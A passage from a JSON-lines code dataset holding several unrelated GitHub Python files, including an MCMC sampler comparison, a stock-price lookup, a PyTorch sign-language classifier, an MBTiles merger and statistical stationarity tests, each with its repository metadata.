dump ground truth samples\n try:\n f = open(filename_Z, \"w\")\n dump(Z, f)\n f.close()\n except IOError:\n print(\"Could not save Z\")\n \n return Z, hopfield\n\ndef run_kameleon_chain(Z, hopfield, start, num_iterations):\n threshold = 0.8\n spread = 0.03\n gamma = 0.2\n kernel = HypercubeKernel(gamma)\n sampler = DiscreteKameleon(hopfield, kernel, Z, threshold, spread)\n params = MCMCParams(start=start, num_iterations=num_iterations)\n chain = MCMCChain(sampler, params)\n chain.run()\n \n return chain\n\ndef run_gibbs_chain(hopfield, start, num_iterations):\n d = hopfield.dimension\n current_state = [x for x in start]\n distribution = HopfieldFullConditionals(full_target=hopfield,\n current_state=current_state)\n sampler = Gibbs(distribution)\n params = MCMCParams(start=asarray(current_state, dtype=numpy.bool8), num_iterations=num_iterations * d)\n chain = MCMCChain(sampler, params)\n chain.append_mcmc_output(StatisticsOutput(plot_times=True, lag=1000))\n chain.run()\n \n return chain\n\ndef run_sm_chain(hopfield, start, num_iterations):\n current_state = [x for x in start]\n spread = 0.03\n sampler = StandardMetropolisDiscrete(hopfield, spread)\n params = MCMCParams(start=asarray(current_state, dtype=numpy.bool8), num_iterations=num_iterations)\n chain = MCMCChain(sampler, params)\n chain.append_mcmc_output(StatisticsOutput(plot_times=True, lag=1000))\n chain.run()\n \n return chain\n\ndef main():\n Z, hopfield = create_ground_truth()\n d = hopfield.dimension\n \n print(\"Number of ground truth samples: %d\" % len(Z))\n\n num_iterations = 200000\n warm_up = 1000\n thin = 100\n \n start = randint(0, 2, d).astype(numpy.bool8)\n timestring = time.strftime(\"%Y-%m-%d_%H:%M:%S\")\n\n print(\"Running SM for %d iterations\" % num_iterations)\n sm_chain = run_sm_chain(hopfield, start, num_iterations)\n try:\n fname = \"temp_sm_result_\" + timestring + \".bin\"\n f = open(fname, \"w\")\n dump(sm_chain, f)\n f.close()\n except IOError:\n print(\"Could not save this SM chain\")\n\n print(\"Running Gibbs for %d iterations\" % (num_iterations * d))\n gibbs_chain = run_gibbs_chain(hopfield, start, num_iterations)\n try:\n fname = \"temp_gibbs_result_\" + timestring + \".bin\"\n f = open(fname, \"w\")\n dump(gibbs_chain, f)\n f.close()\n except IOError:\n print(\"Could not save this Gibbs chain\")\n \n print(\"Running Discrete Kameleon for %d iterations\" % num_iterations)\n kameleon_chain = run_kameleon_chain(Z, hopfield, start, num_iterations)\n try:\n fname = \"temp_kameleon_result_\" + timestring + \".bin\"\n f = open(fname, \"w\")\n dump(kameleon_chain, f)\n f.close()\n except IOError:\n print(\"Could not save this Kameleon chain\")\n \n \n # remove warm up and thin\n print(\"Removing warm up and thinning\")\n S_g = gibbs_chain.samples[warm_up:]\n S_g = S_g[arange(len(S_g), step=thin * d)].astype(numpy.bool8)\n S_k = kameleon_chain.samples[warm_up:]\n S_k = S_k[arange(len(S_k), step=thin)].astype(numpy.bool8)\n S_sm = sm_chain.samples[warm_up:]\n S_sm = S_sm[arange(len(S_sm), step=thin)].astype(numpy.bool8)\n print(\"Gibbs samples: %d\" % len(S_g))\n print(\"Kameleon samples: %d\" % len(S_k))\n print(\"SM samples: %d\" % len(S_sm))\n \n \n print(\"MMDs:\")\n kernel = HypercubeKernel(0.2)\n \n num_evaluations = 10\n inds_g = linspace(0, len(S_g), num_evaluations).astype(numpy.int)\n inds_k = linspace(0, len(S_k), num_evaluations).astype(numpy.int)\n inds_sm = linspace(0, len(S_sm), num_evaluations).astype(numpy.int)\n mmds = zeros((3, num_evaluations - 1))\n for i in arange(num_evaluations - 1):\n mmds[0, i - 1] = sqrt(kernel.estimateMMD(S_g[:inds_g[i + 1]], Z))\n mmds[1, i - 1] = sqrt(kernel.estimateMMD(S_k[:inds_k[i + 1]], Z))\n mmds[2, i - 1] = sqrt(kernel.estimateMMD(S_sm[:inds_sm[i + 1]], Z))\n \n \n print(mmds)\n plot(inds_g[1:], mmds[0, :])\n plot(inds_k[1:], mmds[1, :])\n plot(inds_sm[1:], mmds[2, :])\n legend([\"Gibbs\", \"Kameleon\", \"SM\"])\n show()\n \n \nif __name__ == '__main__':\n main()\n","repo_name":"karlnapf/kameleon-mcmc","sub_path":"kameleon_mcmc/tests/discrete/initial_comparison_discrete.py","file_name":"initial_comparison_discrete.py","file_ext":"py","file_size_in_byte":7514,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"2"} +{"seq_id":"41734637621","text":"# Configuration settings for your blockchain project\n\n# Network port for the Flask app\nFLASK_PORT = 5000\n\n# Mining difficulty level (adjust as needed)\nMINING_DIFFICULTY = 4 # Adjust for your requirements\n\n# Mining reward for miners (in your cryptocurrency)\nMINING_REWARD = 1.0 # Example: 1 unit of your cryptocurrency\n\n# Genesis block data\nGENESIS_DATA = {\n 'index': 1,\n 'previous_hash': '0',\n 'timestamp': 0,\n 'transactions': [],\n 'proof': 100,\n}\n","repo_name":"Aayush518/FormalChain","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"2866192602","text":"from datetime import timedelta, datetime\r\n\r\n#ref: http://twstock.readthedocs.io/zh_TW/latest/quickstart.html#id2\r\nimport twstock\r\n\r\nimport matplotlib\r\n\r\ndef stocksFind(text):\r\n matplotlib.use('Agg') # ref: https://matplotlib.org/faq/howto_faq.html\r\n content = ''\r\n\r\n stock_rt = twstock.realtime.get(text)\r\n my_datetime = datetime.fromtimestamp(stock_rt['timestamp'] + 8 * 60 * 60)\r\n my_time = my_datetime.strftime('%H:%M:%S')\r\n\r\n content += '%s (%s) %s\\n' % (\r\n stock_rt['info']['name'],\r\n stock_rt['info']['code'],\r\n my_time)\r\n content += '現價: %s / 開盤: %s\\n' % (\r\n stock_rt['realtime']['latest_trade_price'],\r\n stock_rt['realtime']['open'])\r\n content += '最高: %s / 最低: %s\\n' % (\r\n stock_rt['realtime']['high'],\r\n stock_rt['realtime']['low'])\r\n content += '量: %s\\n' % (stock_rt['realtime']['accumulate_trade_volume'])\r\n\r\n stock = twstock.Stock(text) # twstock.Stock('2330')\r\n content += '-----\\n'\r\n content += '最近五日價格: \\n'\r\n price5 = stock.price[-5:][::-1]\r\n date5 = stock.date[-5:][::-1]\r\n for i in range(len(price5)):\r\n # content += '[%s] %s\\n' %(date5[i].strftime(\"%Y-%m-%d %H:%M:%S\"), price5[i])\r\n content += '[%s] %s\\n' % (date5[i].strftime(\"%Y-%m-%d\"), price5[i])\r\n\r\n return content\r\n\r\n#a = stocksFind()\r\n#print(a)","repo_name":"michelle4232/final_s1073349","sub_path":"stock.py","file_name":"stock.py","file_ext":"py","file_size_in_byte":1361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"12322780090","text":"# recommend3.py -> 추천 3 메인 파일: 선호배우가 출연한 영화 가져옴\nfrom pandas import read_csv\nimport sys\n\ndef process(fActor):\n random_num = []\n df = read_csv('csv/movie_info.csv')\n result_movie = \"\"\n result_poster = \"\"\n fActor2 = str(fActor).strip('\\n').strip('\\n')\n for i in range(len(df)):\n if(fActor2 in df['actor'][i]):\n random_num.append(i)\n\n count = 0\n for i in range(len(random_num)):\n if count<10:\n result_movie += df['original_title'][random_num[i]] + \", \"\n result_poster += df['poster_path'][random_num[i]] + \", \"\n count+=1\n\n result_movie=result_movie.strip().strip(',')\n result_poster=result_poster.strip().strip(',')\n\n print(\"[\"+result_movie+\"],[\"+result_poster+\"]\")\n\nif __name__ == '__main__':\n process(sys.argv[1])\n","repo_name":"SeowonPark001/Allons-y-back","sub_path":"recommend/recommend3.py","file_name":"recommend3.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"2"} +{"seq_id":"70347516846","text":"import math\nimport numpy as np\n\n\ndef softmax(x):\n return np.exp(x) / np.sum(np.exp(x))\n\n\nclass CurriculumScheduler:\n def __init__(self, start, stop, step_epoch, step_size=1) -> None:\n assert start <= stop\n self.start = start\n self.stop = stop\n self.step_epoch = step_epoch\n self.step_size = step_size\n\n def __call__(self, epoch):\n tot_steps = max(math.floor(epoch - 1 / self.step_epoch), 0)\n return min(self.start + tot_steps * self.step_size, self.stop)\n\n\nclass StochasticCurriculumScheduler:\n def __init__(self, start, stop, stddev) -> None:\n self.start = start\n self.stop = stop\n self.stddev = stddev\n self.default_vector = np.arange(start=start, stop=stop + 1)\n self.rng = np.random.default_rng(7337)\n\n def __call__(self, epoch):\n # calculate gaussian based on default vector\n result_vector = (1 / (np.sqrt(2 * np.pi) * self.stddev)) * np.exp(\n -(1 / 2) * ((self.default_vector - epoch) / self.stddev) ** 2\n )\n # apply softmax to result vector\n result_probs = softmax(result_vector)\n # sample index from result vector based on probabilities\n sampled_size = self.rng.choice(self.default_vector, 1, p=result_probs)[0]\n # return size\n return sampled_size\n","repo_name":"dschaub95/rltsp","sub_path":"main_code/training/curriculum_scheduler.py","file_name":"curriculum_scheduler.py","file_ext":"py","file_size_in_byte":1329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"12324606685","text":"import requests\nfrom urllib3.util.retry import Retry\nfrom requests.adapters import HTTPAdapter\nfrom bs4 import BeautifulSoup\nimport os\n\ndef visit(url):\n retries = Retry(total=5,backoff_factor=10, status_forcelist=[500,502,503,504])\n headers = {\n 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36',\n 'Accept-Language': 'zh-CN,zh;q=0.9,eo;q=0.8'\n }\n s = requests.Session()\n s.mount('http://', HTTPAdapter(max_retries=retries))\n response = s.get(url, headers=headers, stream=True)\n return response\n#获取网页标题\ndef getTitle(url):\n html = visit(url).text\n soup = BeautifulSoup(html,'html.parser')\n page_title = soup.find('title').text.replace(\" \",\"\").replace(\"\\n\",\"\").replace('Chinesehomemadevideo','')\n return page_title\nif __name__ == '__main__':\n test_url = 'https://google.com'\n html = visit(test_url).text\n #print(html)\n title = getTitle(test_url)\n print(title)\n\ndef delete(path):\n if os.path.exists(path):\n os.remove(path)\n else:\n print(\"The file does not exist\")\n","repo_name":"donfo22/mdowm","sub_path":"common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"73305382447","text":"import numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nimport torch.optim as optim\r\nimport PlotFunctions as PF\r\nimport sklearn.metrics as metrics\r\nfrom torch.utils.data import DataLoader, Dataset\r\nfrom torch.autograd import Variable\r\n\r\nfrom sklearn.model_selection import train_test_split\r\n\r\n#Define Net class\r\nclass Net(nn.Module):\r\n\tdef __init__(self):\r\n\t\tsuper(Net, self).__init__()\r\n\t\tself.conv1 = nn.Conv2d(in_channels=1, out_channels=6, kernel_size=5) #60*60\r\n\t\tself.conv2 = nn.Conv2d(in_channels=6, out_channels=16, kernel_size=5) #Previous 2*2 pooling => 26*26\r\n\t\tself.nr_flat_features = 16 * 13 * 13 #Previous 2x2 pooling => 13x13\r\n\t\tself.fc1 = nn.Linear(self.nr_flat_features, 200)\r\n\t\tself.fc2 = nn.Linear(200, 120)\r\n\t\tself.fc3 = nn.Linear(120, 10)\r\n\t\t\r\n\t\t\r\n\tdef forward(self, x):\r\n\t\tout = F.max_pool2d(F.relu(self.conv1(x)),2) #30*30\r\n\t\tout = F.max_pool2d(F.relu(self.conv2(out)),2) #26*26\r\n\t\tout = out.view(-1,self.nr_flat_features) #Reshape into vector of (nr_channels=16, 13*13)\r\n\t\tout = self.fc3(F.relu(self.fc2(F.relu(self.fc1(out)))))\r\n\t\treturn out\r\n\r\n\t\r\n#A class to prepare our data for the DataLoader can be defined\r\n'''Any custom dataset class has to inherit from the PyTorch dataset Class.\r\nAlso, should have __len__ and __getitem__ atributes\r\nset. __init__ method allows to manipulate and transform our raw data'''\r\nclass prepData(Dataset):\r\n\tdef __init__(self, X, Y):\r\n\t\tX = X.reshape((-1,1,64,64)) #Add one channel to use convolution. first dimensions refers to number of images\r\n\t\ty_order = np.argsort([9,0,7,6,1,8,4,3,2,5])\r\n\t\tY = Y[:,y_order].argmax(axis=1) #Y is one hot encoded, thus needs to be converted to integer\r\n\t\tself.X = torch.from_numpy(X)\r\n\t\tself.Y = torch.from_numpy(Y)\r\n\t\t\r\n\tdef __len__(self):\r\n\t\t#Length of our data\r\n\t\treturn len(self.Y)\r\n\r\n\tdef __getitem__(self, idx):\r\n\t\t#Allows to get a sample from our dataset\r\n\t\tX = self.X[idx]\r\n\t\tY = self.Y[idx]\r\n\t\t\r\n\t\tsample = {'X': X, 'Y': Y}\r\n\t\treturn sample\r\n\r\n#Load the data and split it in train and test\r\nx_l = np.load('Data\\X.npy')\r\ny_l = np.load('Data\\Y.npy')\r\nx_train, x_test, y_train, y_test = train_test_split(x_l, y_l, test_size=0.2, random_state=42)\r\n\r\n#Transform our data into tensors to be read by our CNN and split it in shuffled batches\r\nbatch_size = 32\r\ntrainData = prepData(x_train, y_train)\r\ntrainDataL = DataLoader(trainData, batch_size=batch_size)\r\n\r\ntestData = prepData(x_test, y_test)\r\ntestDataL = DataLoader(testData, batch_size=batch_size)\r\n\r\nnet = Net()\r\ncriterion = nn.CrossEntropyLoss()\r\noptimizer = optim.Adam(net.parameters(), lr=0.001)\r\n\r\n#Initialize counters for accuracy and epoch\r\nacc_tr, loss_tr = [[],[]],[[],[]]\r\nstart_epoch = 0\r\n\r\n\r\n\r\n#Define procedure for training the network\r\ndef train(epoch):\r\n\tnet.train()\r\n\ttrain_loss = 0\r\n\tacc_meas = [0,0]\r\n\tb_id = 0\r\n\ttotal_sample, total_predictions = [], []\r\n\t\r\n\t#for each batch generated by DataLoader\r\n\tfor batch_id, sample in enumerate(trainDataL):\r\n\t\toptimizer.zero_grad() #Clear the gradients from our optimizer\r\n\t\t# inputs, targets = sample['X'], sample['Y']\r\n\t\toutputs = net(sample['X'])\r\n\t\tloss = criterion(outputs, sample['Y']) #Calculate the loss between predictions and targets\r\n\t\tloss.backward() #Get the gradient values\r\n\t\toptimizer.step() #Update the weights of the optimizer with the gradients calculated\r\n\t\t\r\n\t\ttrain_loss += loss.item() #add the loss of each batch to be able to calculate the overall loss\r\n\t\t_, predicted = torch.max(outputs.data, 1)\r\n\t\t\r\n\t\ttotal_sample += sample['Y'].tolist()\r\n\t\ttotal_predictions += predicted.tolist()\r\n\t\t\r\n\t\tacc_meas[1] += sample['Y'].size(0)\r\n\t\tacc_meas[0] += metrics.accuracy_score(sample['Y'], predicted, normalize=False)\r\n\t\tb_id += 1\r\n\t\r\n\tacc_tr[0].append(100. * acc_meas[0] / acc_meas[1])\r\n\tloss_tr[0].append(train_loss/(b_id))\r\n\tprint('TRAIN Epoch %d | Loss: %.3f | Acc: %.3f%% (%d/%d)' % (\r\n\t\tepoch, train_loss / (b_id), 100. * acc_meas[0] / acc_meas[1], acc_meas[0], acc_meas[1]))\r\n\tif epoch == 14:\r\n\t\tprint(metrics.classification_report(total_sample, total_predictions))\r\n\r\n\r\ndef test(epoch):\r\n\tnet.eval()\r\n\ttest_loss = 0\r\n\tacc_meas = [0, 0, 0]\r\n\tb_id = 0\r\n\t\r\n\t# for each batch generated by DataLoader\r\n\tfor batch_id, sample in enumerate(testDataL):\r\n\t\toutputs = net(sample['X'])\r\n\t\tloss = criterion(outputs, sample['Y']) # Calculate the loss between predictions and targets\r\n\t\t\r\n\t\ttest_loss += loss.item() # add the loss of each batch to be able to calculate the overall loss\r\n\t\t_, predicted = torch.max(outputs.data, 1)\r\n\t\tacc_meas[1] += sample['Y'].size(0)\r\n\t\tacc_meas[0] += metrics.accuracy_score(sample['Y'], predicted, normalize=False)\r\n\t\tb_id += 1\r\n\t\r\n\tacc_tr[1].append(100. * acc_meas[0] / acc_meas[1])\r\n\tloss_tr[1].append(test_loss/(b_id))\r\n\tprint('TEST Epoch %d | Loss: %.3f | Acc: %.3f%% (%d/%d)' % (\r\n\t\tepoch, test_loss / (b_id), 100. * acc_meas[0] / acc_meas[1], acc_meas[0], acc_meas[1]))\r\n\r\n\r\n\r\n\r\nnr_epochs=15\r\nfor epoch in range(start_epoch, start_epoch+nr_epochs):\r\n\ttrain(epoch)\r\n\ttest(epoch)\r\n\t\r\nt = np.arange(nr_epochs)\r\n\r\n'''\r\n#Plot accuracy and loss for train and test sets for each epoch\r\nfig, axes = plt.subplots(2,1)\r\nax1, ax2 = PF.two_y_axis(t,acc_tr[0],loss_tr[0], axes[0])\r\nax3, ax4 = PF.two_y_axis(t,acc_tr[1],loss_tr[1], axes[1])\r\n\r\n#Set axes and colors\r\nax1.set_ylabel('Accuracy', color='b')\r\nax1.tick_params('y', colors='b')\r\nax1.set_title('Accuracy and Loss for Train Set')\r\nax2.set_ylabel('Loss', color='r')\r\nax2.tick_params('y', colors='r')\r\n\r\nPF.setattrs(ax1.lines[0],'b')\r\nPF.setattrs(ax2.lines[0],'r')\r\n\r\nax3.set_title('Accuracy and Loss for Test Set')\r\nax3.set_xlabel('Epoch')\r\nax3.set_ylabel('Accuracy', color='b')\r\nax3.tick_params('y', colors='b')\r\nax4.set_ylabel('Loss', color='r')\r\nax4.tick_params('y', colors='r')\r\n\r\nPF.setattrs(ax3.lines[0],'b')\r\nPF.setattrs(ax4.lines[0],'r')\r\n'''\r\n\r\n#Plot accuracy\r\nfig, ax = plt.subplots()\r\nplt.plot(t,acc_tr[0],'b-')\r\nplt.plot(t,acc_tr[1],'r-.')\r\nplt.title('Accuracy for Train and Test Sets')\r\nax.set_xlabel('Epoch')\r\nax.set_ylabel('Accuracy (%)')\r\n\r\nlabels = ['train', 'test']\r\nplt.legend(labels, fancybox=True, shadow=True, labelspacing=0.0)\r\n\r\nfig.tight_layout()\r\nplt.show()\r\n","repo_name":"TSPereira/Kaggle-Projects","sub_path":"Sign Language/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":6353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"16536788744","text":"n = int(input())\n\nfor _ in range(n):\n x, y = map(int, input().split())\n dist = y - x\n \n count = 1\n number = 2\n \n while number < dist:\n count += 1\n number += count * 2\n \n diff = number - dist\n \n if diff >= count:\n print(count * 2 -1)\n else:\n print(count * 2)","repo_name":"hodurie/Algorithm","sub_path":"Baekjoon/Silver/1011.py","file_name":"1011.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"80030571","text":"#! /usr/bin/env python3\n'''\n(C) 2020 Andreas Vogel\nwww.wellenvogel.de\nMIT license\n\nPrepare with\npip install pillow\n'''\n\nimport sqlite3\nimport sys\nimport os\nfrom PIL import Image\nimport io\nimport getopt\n\ndef usage():\n print(\"usage: %s [-a] [-q] outfile infile [infile...]\\n\"%sys.argv[0])\n\nCREATES=[\n \"CREATE TABLE tiles (zoom_level integer,tile_column integer,tile_row integer, tile_data blob)\",\n \"CREATE TABLE metadata (name text, value text)\",\n \"CREATE UNIQUE INDEX name on metadata (name)\",\n \"CREATE UNIQUE INDEX tile_index on tiles(zoom_level, tile_column, tile_row)\"\n]\n\nclass Box:\n def __init__(self,minCol=None,maxCol=None,minRow=None,maxRow=None):\n self.minCol=minCol\n self.maxCol=maxCol\n self.minRow=minRow\n self.maxRow=maxRow\n\n def valid(self):\n if self.minCol is None:\n return False\n if self.maxCol is None:\n return False\n if self.minRow is None:\n return False\n if self.maxRow is None:\n return False\n return True\n\n def rowRange(self):\n return range(self.minRow,self.maxRow+1)\n\n def colRange(self):\n return range(self.minCol,self.maxCol+1)\n\n def merge(self,other):\n if not other.valid():\n return\n if other.minCol < self.minCol:\n self.minCol=other.minCol\n if other.minRow < self.minRow:\n self.minRow = other.minRow\n if other.maxCol > self.maxCol:\n self.maxCol=other.maxCol\n if other.maxRow > self.maxRow:\n self.maxRow=other.maxRow\n\n def __str__(self) -> str:\n return \"minCol=%s,maxCol=%d,minRow=%d,maxRow=%d\"%(self.minCol,self.maxCol,self.minRow,self.maxRow)\n\n\ndef row2y(row,zoom,format=\"xyz\"):\n if format == \"xyz\":\n return pow(2,zoom)-1-row\n else:\n return row\n\ndef mergeTile(tileDataStack,format):\n if len(tileDataStack) == 1:\n return tileDataStack[0]\n im=Image.open(io.BytesIO(tileDataStack[0])).convert(\"RGBA\")\n for d in tileDataStack[1:]:\n if len(d) == 0:\n continue\n try:\n mi=Image.open(io.BytesIO(d)).convert(\"RGBA\")\n im=Image.alpha_composite(im,mi)\n except Exception as e:\n print(\"error in overlay tile, ignore\")\n continue\n out =io.BytesIO()\n im.convert(\"RGB\").save(out,format)\n return out.getvalue()\n\ndef insertTiles(conn,stack):\n conn.executemany(\"insert into tiles (zoom_level,tile_column,tile_row,tile_data) values(?,?,?,?)\",stack)\n\ndef getTileFormat(conn):\n row=conn.execute(\"select tile_data from tiles limit 10\")\n format =None\n while format is None:\n t=row.fetchone()\n if t is None:\n row.close()\n return None\n if len(t[0]) > 0:\n img=Image.open(io.BytesIO(t[0]))\n if img.format is not None:\n return img.format\n\ndef fetchTile(connection,col,row,zoom):\n cu = connection.execute(\"select tile_data from tiles where zoom_level=? and tile_column=? and tile_row=?\", [zoom, col, row])\n t = cu.fetchone()\n cu.close()\n if t is None:\n return None\n return t[0]\n\ndef mergeMbTiles(outfile,infiles,mergeAll=False,silent=False):\n if len(infiles) < 1:\n usage()\n return False\n if os.path.exists(outfile):\n print(\"outfile %s already exists\"%outfile)\n return False\n for f in infiles:\n if not os.path.exists(f):\n print(\"infile %s not found\"%f)\n return False\n if not silent:\n print(\"writing to %s\"%outfile)\n #compute boxes\n minZoom=None\n maxZoom=None\n boxes={}\n boxfiles=infiles[0:0] if not mergeAll else infiles\n isBase=True\n format=None\n connections=[]\n for h in boxfiles:\n if not silent:\n print(\" layer %s\"%h)\n connection=sqlite3.connect(h)\n connections.append(connection)\n if connection is None:\n print(\"unable to open sqlite connection to %s\"%h)\n return False\n zoomlevels=[]\n cu=connection.execute(\"select distinct zoom_level from tiles\")\n for z in cu.fetchall():\n zoomlevels.append(z[0])\n cu.close()\n if len(zoomlevels) < 1:\n print(\"no zoomlevels found in %s\"%h)\n return False\n if not silent:\n print(\"zoom levels in %s: %s\" % (h, \",\".join(map(lambda x: str(x),zoomlevels))))\n for zoom in zoomlevels:\n box=Box()\n cu=connection.execute(\"select min(tile_column),max(tile_column) from tiles where zoom_level=?\",[zoom])\n data = cu.fetchone()\n if data is not None:\n box.minCol=data[0]\n box.maxCol=data[1]\n cu.close()\n cu = connection.execute(\"select min(tile_row),max(tile_row) from tiles where zoom_level=?\", [zoom])\n data = cu.fetchone()\n if data is not None:\n box.minRow=data[0]\n box.maxRow=data[1]\n cu.close()\n if not silent:\n print(\"zoom=%d, %s\"%(zoom,str(box)))\n existing=boxes.get(zoom)\n if existing is not None:\n existing.merge(box)\n if not silent:\n print(\"updated: zoom=%d, %s\"%(zoom,str(existing)))\n else:\n boxes[zoom]=box\n if isBase:\n format=getTileFormat(connection)\n if format is None:\n print(\"unable to determine tile format for base layer %s\"%h)\n return False\n if not silent:\n print(\"base layer tile format is %s\"%format)\n isBase=False\n\n outconnection=sqlite3.connect(outfile)\n if outconnection is None:\n print(\"cannot create %s\"%outfile)\n return False\n outcu=outconnection.cursor()\n for stmt in CREATES:\n if not silent:\n print(\"executing %s\"%stmt)\n outcu.execute(stmt)\n if not mergeAll:\n for ov in infiles[1:]:\n print(\"adding %s\"%ov)\n c=sqlite3.connect(ov)\n connections.append(c)\n for zoom in sorted(boxes.keys()):\n box=boxes[zoom]\n if not box.valid():\n print(\"no tiles at zoom %d\"%zoom)\n continue\n insertStack=[]\n for row in box.rowRange():\n for col in box.colRange():\n tileDataStack=[]\n for c in connections:\n t=fetchTile(c,col,row,zoom)\n if t is not None:\n tileDataStack.append(t)\n if len(tileDataStack) < 1:\n if not silent:\n print('no tile for z=%d,row=%d,col=%d'%(zoom,row,col))\n continue\n try:\n outdata=mergeTile(tileDataStack,format)\n except Exception as e:\n print(\"error when creating tile z=%d,row=%d,col=%d: %s\"%(zoom,row,col,e))\n continue\n insertStack.append([zoom,col,row,outdata])\n if len(insertStack) >=10:\n insertTiles(outconnection,insertStack)\n insertStack=[]\n outconnection.commit()\n outconnection.close()\n\n\n\n\n\n\nif __name__ == \"__main__\":\n try:\n opts,args=getopt.getopt(sys.argv[1:],'aq')\n except getopt.GetoptError as e:\n print(e)\n usage()\n sys.exit(1)\n if len(args) < 3:\n usage()\n sys.exit(1)\n mergeAll=False\n silent=False\n for o,a in opts:\n if o == '-s':\n silent=True\n elif o == '-a':\n mergeAll=True\n mergeMbTiles(args[0],args[1:],mergeAll=mergeAll,silent=silent)\n","repo_name":"wellenvogel/mbtilesmerge","sub_path":"merger.py","file_name":"merger.py","file_ext":"py","file_size_in_byte":6754,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"70588802287","text":"import sys\r\nsys.path.append(\"..\")\r\nsys.path.append(\".\")\r\nfrom utils import *\r\nimport numpy as np\r\nfrom morphological import binary_edge\r\nif __name__ == '__main__':\r\n img = get_examples_image()\r\n img[img > 127] = 255\r\n img[img <= 127] = 0\r\n s = visualization(1,3)\r\n s.append_img(img)\r\n kernel = np.ones((5,5))\r\n s.append_img(binary_edge(img,kernel))\r\n kernel = np.ones((11,11))\r\n s.append_img(binary_edge(img,kernel))\r\n s.show()","repo_name":"chinoll/digital_image_processing","sub_path":"morphological/binary_edge.py","file_name":"binary_edge.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"2"} +{"seq_id":"41588815230","text":"from advent.input_reader import read_list_of_values\n\ncypher = read_list_of_values('input/2020/day_8', int)\n\npre = 25\ninv = -1\n\nprint('Part 1')\nfor i in range(pre, len(cypher)):\n val = cypher[i]\n ok = False\n for n in cypher[i-pre:i]:\n for m in cypher[i-pre:i]:\n if n != m and n+m == val:\n ok = True\n break\n if ok:\n break\n if not ok:\n inv = val\n print(val)\n break\n\nprint('Part 2')\n\nok = False\nfor i, n in enumerate(cypher):\n # print(f'start at [{i}]: {n}')\n val = n\n for j, m in enumerate(cypher[i+1:]):\n val += m\n # print(f'sums to {val}')\n if val == inv:\n print(cypher[i:j + i + 2], sum(cypher[i:j + i + 2]))\n a = min(cypher[i:j + i + 2])\n b = max(cypher[i:j + i + 2])\n print(f'{a}+{b}={a+b}')\n ok = True\n break\n if val > inv:\n break\n if ok:\n break\n\nprint(sum(cypher[562:579]))","repo_name":"LouisAumaitre/AdventOfCode","sub_path":"advent/_2020/day_9.py","file_name":"day_9.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"4601121555","text":"import pandas as _pd\nimport statsmodels.api as sm\nfrom statsmodels.compat import lzip\nfrom statsmodels.stats.stattools import jarque_bera as _jarque_bera\nfrom statsmodels.tsa.stattools import adfuller as _adfuller\nfrom statsmodels.tsa.stattools import kpss as _kpss\n\n\ndef test_jarque_bera(s, alpha=0.01, **kwargs):\n print('H0: sample datasets have the skewness and kurtosis matching a normal distribution', end='\\n\\n')\n print('Results of Jarque Bera Test:')\n jqberatest = _jarque_bera(s, **kwargs)\n jq_output = _pd.Series(jqberatest, index=['Test Statistic', 'p-value', 'skew', 'kurtosis'])\n print(jq_output, end='\\n\\n')\n pvalue = jqberatest[1]\n if pvalue < alpha:\n print(f'p-value {pvalue:.4f} is less alpha {alpha} => Reject H0')\n else:\n print('Can NOT reject H0')\n\n\ndef test_kpss(timeseries, alpha=0.01, **kwargs):\n trend_name = kwargs.get('regression', 'constant')\n if trend_name == 'ct':\n trend_name = 'trend'\n print('H0: observable time series is stationary around a {}'.format(trend_name), end='\\n\\n')\n print('Results of KPSS Test:')\n kpsstest = _kpss(timeseries, **kwargs)\n kpss_output = _pd.Series(kpsstest[0:3], index=['Test Statistic', 'p-value', 'Lags Used'])\n for key, value in kpsstest[3].items():\n kpss_output['Critical Value (%s)' % key] = value\n print(kpss_output, end='\\n\\n')\n pvalue = kpsstest[1]\n if pvalue < alpha:\n print(f'p-value {pvalue:.4f} is less alpha {alpha} => Reject H0')\n else:\n print('Can NOT reject H0')\n\n\ndef test_adf(timeseries, alpha=0.01, **kwargs):\n print('H0: unit root present in the time series', end='\\n\\n')\n print('Results of Dickey-Fuller Test:')\n dftest = _adfuller(timeseries, **kwargs)\n dfoutput = _pd.Series(dftest[0:4], index=['Test Statistic', 'p-value', '#Lags Used', 'Number of Observations Used'])\n for key, value in dftest[4].items():\n dfoutput['Critical Value (%s)' % key] = value\n print(dfoutput, end='\\n\\n')\n pvalue = dftest[1]\n if pvalue < alpha:\n print(f'p-value {pvalue:.4f} is less alpha {alpha} => Reject H0')\n else:\n print('Can NOT reject H0')\n\n\ndef test_condition_number():\n pass\n\n\ndef test_variance_inflation_factor():\n pass\n\n\ndef test_breusch_pagan(s, exog, alpha=0.01, **kwargs):\n print('H0: series is homoskedastic', end='\\n\\n')\n print('Results of BP Test:')\n names = ['Lagrange multiplier statistic', 'p-value',\n 'f-value', 'f p-value']\n bptest = sm.stats.het_breuschpagan(s, exog)\n bp_output = _pd.Series(bptest, index=names)\n print(bp_output, end='\\n\\n')\n pvalue = bptest[1]\n if pvalue < alpha:\n print(f'p-value {pvalue:.4f} is less 